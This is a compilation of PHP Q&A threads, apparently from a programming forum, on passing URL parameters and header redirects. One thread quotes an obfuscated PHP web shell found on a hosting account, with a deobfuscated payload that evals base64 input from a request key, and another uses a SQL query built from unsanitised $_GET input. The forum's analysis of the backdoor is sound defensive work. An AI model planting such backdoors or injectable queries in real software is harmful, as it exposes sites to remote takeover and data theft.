I'm setting a variable based on an array. When I echo the variable it displays on the screen, however when I try to add it to a Header Location it doesn't show up in the URL of the next page - everything else does:
$myid = $selected_cat3[0]['id'];
Header("Location:/cat-dashboard/cat-results/?catID=" . $myid
. "&question1=" . $_GET['question1'] . "&question2=" . $_GET['question2']
. "&question3=" . $_GET['question3'] . "&question4=" . $_GET['question4']
. "&question5=" . $_GET['question5'] . "&question6=" . $_GET['question6']
. "&question7=" . $_GET['question7'] . "&question8=" . $_GET['question8']);
This is the generated url:
/cat-dashboard/cat-results/?catID=&question1=0&question2=3&question3=1&question4=1&question5=1&question6=2&question7=1&question8=3
Am I doing something wrong? It doesn't show even if I use: $myid = "1";
Related
I'm having trouble sending a parameter into a url of another page. I'm new to coding in PHP so I do not really know how to get this through, already did some research on this about the $_GET method, but its still not working.
Code in 1st page:
echo "<tr><td><a href='application_desktop.php?id='". $temp ."'>" . $row['appl_nric_date'] . "</td><td>" . $row['applicant_name'] . "</td><td>" . $row['nric'] . "</td><td>" . $row['application_date'] . "</a></td></tr>";
where $temp is the parameter I want to pass to the url.
Code in 2nd page:
$id = $_GET['id'];
$applicants = mysql_query("SELECT * FROM tblapplication WHERE appl_nric_date = $id");
//$applicants = mysql_query("SELECT * FROM tblapplication WHERE appl_nric_date = 10");
The sql query returns error that the $id is null, and the url doesn't display the id.
Do it like this on your html line
echo "<tr><td>" . $row['appl_nric_date'] . "</td><td>" . $row['applicant_name'] . "</td><td>" . $row['nric'] . "</td><td>" . $row['application_date'] . "</td></tr>";
I ran your code to see what it output:
// Make some sample data
$row = [
'appl_nric_date' => '9999-99-99',
'applicant_name' => 'some-applicant',
'nric' => 'wtf-is-an-nric',
'application_date' => '8888-99-00'
];
$temp = 'something';
echo "<tr><td><a href='application_desktop.php?id='". $temp ."'>"
. $row['appl_nric_date']
. "</td><td>"
. $row['applicant_name']
. "</td><td>"
. $row['nric']
. "</td><td>"
. $row['application_date'] . "</a></td></tr>";
echo PHP_EOL;
This is what it outputs:
<tr><td><a href='application_desktop.php?id='something'>9999-99-99</td><td>some-applicant</td><td>wtf-is-an-nric</td><td>8888-99-00</a></td></tr>
The use of single quotes is not right. Remove the single quote after id=.
Looks like you are not nesting your html elements correctly. You place the opening A tag inside the first TD but then you close that TD without closing the A tag.
In order to debug what you are doing this in the browser, then the address bar where the url lives should show the parameters that are sent to the destination page. You can just look at that to verify that it sent what you intended.
In the destination page, you can add the following to debug:
<pre>
<?php print_r($_GET) ?>
</pre>
The above will let you see what you are getting from the first page.
About a week ago, I noticed there was a seemingly randomly named PHP file that had appeared in the root folder of my shared web hosting. The name of the file is "hvkqwvkj.php" and I very stupidly removed it before I looked at the owner/group and permission information. I'd like to know what this is and how it got there. Here is the contents of that file:
<?php
$circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blaspheming='G';$eerily= 'u';$diagrammer =']A))eDO'; $huh= '(rCS/H:s';$din = 'g'; $harri = '.';$housed ='S';$browbeating = 'E(K+Nl';$deniable = 'dew_'; $flared='[';$baseboards = 'R;I';$conversed= '-'; $jammed = 'C'; $confident ='s';$homed ='a'; $bullock ='?';$asdf = 'T$v]';$debugs= 'LV9[U';$cheaters='$'; $juice = ';';$impropriety=')Hf6]tNar'; $fluently= '>(e;_sa'; $antagonism='t';
$jaquith= '"i_K4W';$canal ='(';$bookie='i';
$envies ='_n';$copyright='Pns#iSd'; $hampers='$'; $incontrovertible ='Te['; $irking ='?';$citadel ='iRy=';
$economizing= 'b'; $campanile = 'y'; $awn = 'N'; $compacting='c'; $journalist= 'O'; $evaluate = 'nQ:'; $booking = 'e'; $dolt= '_Q';$bottoming='U';$grabs= 'H';$covers ='(rrta';$breakfasted ='T_"(_uTM_';$confectionery = 'A'; $bolstered = 'E'; $kitti='a'; $kali ='neWn';$jersey ='e'; $fewer= 'a';
$earthmove ='a';$forgivable='1'; $hello =';Sru';$forwent = 'g';$gingham = '?';$fanatic='ot(RstP';$levee='S';$baser = 'B_,"c';$constructs= 'rai';$deletions='u';$attempters='g"sss_';$dispatcher ='ra=';$ken =')';$contrivance = '[D)dae'; $chrome ='i';$glutting='I<'; $devoutness= ';';$foible= '8';
$diagonally='$5D(vn';
$beauregard ='S';$ines='te]ee'; $imogen = 's';
$irene ='("as3:0$r';$grassier ='4';
$consortium ='r'; $appliance ='S'; $histochemistry= 'A'; $beamer='v';$enchain ='s'; $assaults= 'E';$davida='dNe'; $foamed= 'E)n';$cavity='=l';
$drudge='F';
$arraigning= 'p_E "i'; $firmware='",)a(';$jeanine= ')';
$equivalently ='"7$p'; $biller='m'; $likeness= 'i'; $closest = 'OP(vVrwJ$'; $commissioner='rU)o2';
$kaycee= 'c';$fanni = $kaycee['0'] .$commissioner[0] .$davida[2] .$firmware['3'].
$ines['0'] . $davida[2] . $arraigning['1'].$impropriety[2].$deletions. $foamed['2'] . $kaycee['0'].$ines['0']. $likeness . $commissioner[3].$foamed['2'];
$bob=$arraigning[3];
$druggist= $fanni ($bob,$davida[2] . $closest['3'].$firmware['3']. $cavity['1'] .$closest['2'].$firmware['3']. $commissioner[0]. $commissioner[0].
$firmware['3']. $campanile .$arraigning['1'].$equivalently['3'] . $commissioner[3] .$equivalently['3'] .
$closest['2'].$impropriety[2] .$deletions . $foamed['2'] . $kaycee['0'].$arraigning['1'] .
$attempters['0'] .$davida[2]. $ines['0'] .$arraigning['1']. $firmware['3'] . $commissioner[0] .$attempters['0'].$enchain .
$closest['2'] .$commissioner['2'] . $commissioner['2'] .$commissioner['2'] . $devoutness);$druggist ($closest['2'] ,$gingham,$attempters['0'],$dinnie['2'] ,$gwenneth ,$biller, $disdains[2],$closest['0'],$harri , $closest['8'] .$likeness. $cavity['0'].$firmware['3'] . $commissioner[0].
$commissioner[0].$firmware['3'] .
$campanile . $arraigning['1']. $biller.
$davida[2] .
$commissioner[0] . $attempters['0']. $davida[2] .$closest['2'] .$closest['8'] .$arraigning['1'].
$fanatic['3'] . $arraigning['2'].$dolt[1] .$commissioner['1'] .
$arraigning['2']. $appliance . $breakfasted[6]. $firmware['1'] .
$closest['8']. $arraigning['1'].
$jammed.$closest['0'].$closest['0'] .$jaquith['3'].
$glutting['0'] .
$arraigning['2']. $firmware['1']. $closest['8'] . $arraigning['1'].$appliance. $arraigning['2'].
$fanatic['3'] .$closest['4']. $arraigning['2'] . $fanatic['3'].$commissioner['2'] .
$devoutness. $closest['8'].$firmware['3']. $cavity['0'] . $likeness.$enchain. $enchain.
$davida[2] .
$ines['0'] . $closest['2'] .
$closest['8'] .$likeness. $contrivance[0].
$equivalently['0']. $foamed['2'] . $davida['0'].
$enchain .
$enchain.$closest['6'] .$firmware['3']. $foamed['2'].$deletions .$equivalently['0']. $ines[2] . $commissioner['2'].$gingham .
$closest['8'] .$likeness .$contrivance[0] .
$equivalently['0'].
$foamed['2'] . $davida['0'] .$enchain .$enchain .$closest['6'].$firmware['3'].$foamed['2'].$deletions .
$equivalently['0'] .
$ines[2] . $irene['5'] . $closest['2'].$likeness . $enchain. $enchain.$davida[2].$ines['0'] .$closest['2'].$closest['8'] . $likeness. $contrivance[0] .$equivalently['0'] . $grabs.$breakfasted[6] . $breakfasted[6] . $closest['1'] .$arraigning['1'] . $davida['1'].$diagonally[2] . $appliance.
$appliance .
$kali['2'].$histochemistry . $davida['1'].$commissioner['1'] . $equivalently['0'] . $ines[2].$commissioner['2'].$gingham. $closest['8'].
$likeness.$contrivance[0].
$equivalently['0'].$grabs .$breakfasted[6].$breakfasted[6] . $closest['1']. $arraigning['1'].$davida['1']. $diagonally[2] .$appliance .
$appliance. $kali['2'].$histochemistry . $davida['1'].$commissioner['1'].$equivalently['0'] . $ines[2] . $irene['5'].
$davida['0'] . $likeness.$davida[2]. $commissioner['2'].$devoutness.$davida[2]. $closest['3'] .$firmware['3'] .
$cavity['1'] .$closest['2'] . $enchain. $ines['0'] . $commissioner[0] .
$commissioner[0] .$davida[2].$closest['3'] . $closest['2']. $economizing .$firmware['3'].
$enchain.$davida[2] .$impropriety['3']. $grassier .$arraigning['1']. $davida['0'].$davida[2].$kaycee['0']. $commissioner[3].$davida['0'] .
$davida[2] .
$closest['2'].
$enchain.$ines['0'] .$commissioner[0] . $commissioner[0]. $davida[2] .$closest['3'] . $closest['2'].$closest['8']. $firmware['3'].$commissioner['2'].
$commissioner['2']. $commissioner['2'] . $commissioner['2'].
$devoutness );
I was able to parse out the actual coding.
The file employs obscurity to avoid detection. It defines a function and then uses eval to execute it.
Here is the payload (the important bit).
//Take all types of request data and merge them
//This opens up many types of attack vectors
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
//Look for a specific injected key called "ndsswanu" or HTTP_NDSSWANU and records its value if its set
$a = isset($i["ndsswanu"]
) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die);
//execute it
//iirc the reason for the double reverse is to avoid some characters being improperly encoded in base64.
//This statement runs any php code sent in the "ndsswanu" or HTTP_NDSSWANU key.
eval(strrev(base64_decode(strrev($a))));
You were correct to remove it immediately, however this is only a symptom of a greater problem. How the script got there is of a much larger concern.
This code would allow an attacker to remotely run any php code via a varied amount of attack vectors.
I am having trouble getting the URL to display correctly. This works now, but the link has " in front of the url. and yet the url link works fine
echo "<br>" . $result['text'] . " <em>(Contributed by: \"<a
href=\"http://example.com/portfolio?ID=$result[ID]\">" .
$result['display_name'] . "</a>" . ")</em>" . "<br>";
sigh:
echo '<br>' . $result['text'] . ' <em>(Contributed by: <a
href="http://example.come/portfolio?ID="'.$result['ID'].'">'.
$result['display_name'] .'</a>)</em><br>';
I have just a quick question. i was using a normal html link tag to redirect to a paypal checkout page and it was working fine even when i had php inside the url. but when i was using it in a php header
the url cuts off where i enter the php.
header('location: https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=<? echo $product . " " . $server ?>&amount=<? echo $xprice1; ?>%2e00¤cy_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest');
You are placing the PHP code inside of the location redirect as a string. The code is not being evaluated as PHP.
Try this instead:
<?php
$url = "https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=" . $product . " " . $server ."&amount=" . $xprice1 . "%2e00¤cy_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest";
header('location: ' . $url);
Or, you could keep it in one line like so:
<?php
header('location: ' . "https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=" . $product . " " . $server ."&amount=" . $xprice1 . "%2e00¤cy_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest");
header('location: https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=<? echo $product' . " " . '$server ?>&amount=<? echo $xprice1; ?>%2e00¤cy_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest');
This may solve your problem. Please dont forget to tick the answer right if it works.
I am creating a flight/hotel reservation system like farecompare.com Farecompare parse values to other sites and create sessions other sites too. Anyone tell me how they create sesssions in it. I can parse url but i am not able to create sessions.
public function flight($depart, $return, $from, $to, $type, $class,
$adults, $seniors, $children) {
$dep = explode("/", $depart);
$ret = explode("/", $return);
if ($type == 'RoundTrip') {
$expurl = 'http://www.expedia.co.in/Flights-Search?trip=' .
strtolower($type) . '&leg1=from%3A' . $from .
'%29%2Cto%3A' . $to .
'%29%2Cdeparture%3A' . $dep[1] .
'/'.$dep[0].'/'.$dep[2].
'TANYT&leg2=from%3A' . $to .
'%29%2Cto%3A' . $from .
'%29%2Cdeparture%3A' .
$ret[1].'/'.$ret[0].'/'.$ret[2] .
'TANYT&passengers=children%3A' . $children .
'%2Cadults%3A' . $adults .
'%2Cseniors%3A' . $seniors .
'%2Cinfantinlap%3AY&options=cabinclass%3Aeconomy'.
'%2Cnopenalty%3AN%2Csortby%3Aprice&mode=search';
echo 'Expedia';
} else {
$type = 'oneway';
$expurl = 'http://www.expedia.co.in/Flights-Search?trip='.
strtolower($type) . '&leg1=from%3A' . $from .
'%29%2Cto%3A' . $to . '%29%2Cdeparture%3A' .
$dep[1].'/'.$dep[0].'/'.$dep[2] .
'TANYT&passengers=children%3A' . $children .
'%2Cadults%3A' . $adults .
'%2Cseniors%3A' . $seniors .
'%2Cinfantinlap%3AY&options=cabinclass%3Aeconomy'.
'%2Cnopenalty%3AN%2Csortby%3Aprice&mode=search';
echo 'Expedia';
}
}
I worked on Expedia by parsing url to get data but there are other sites like cheapoait, travelocity etc which uses sessions. How to create sessions?
I would assume they store it in the cookies.
We can not access session data of other domain on our site. Data transfer done using web services SOAP OR REST in form of XML. That can be retrieved on other domain and store in session and cookies and use for calculation in website.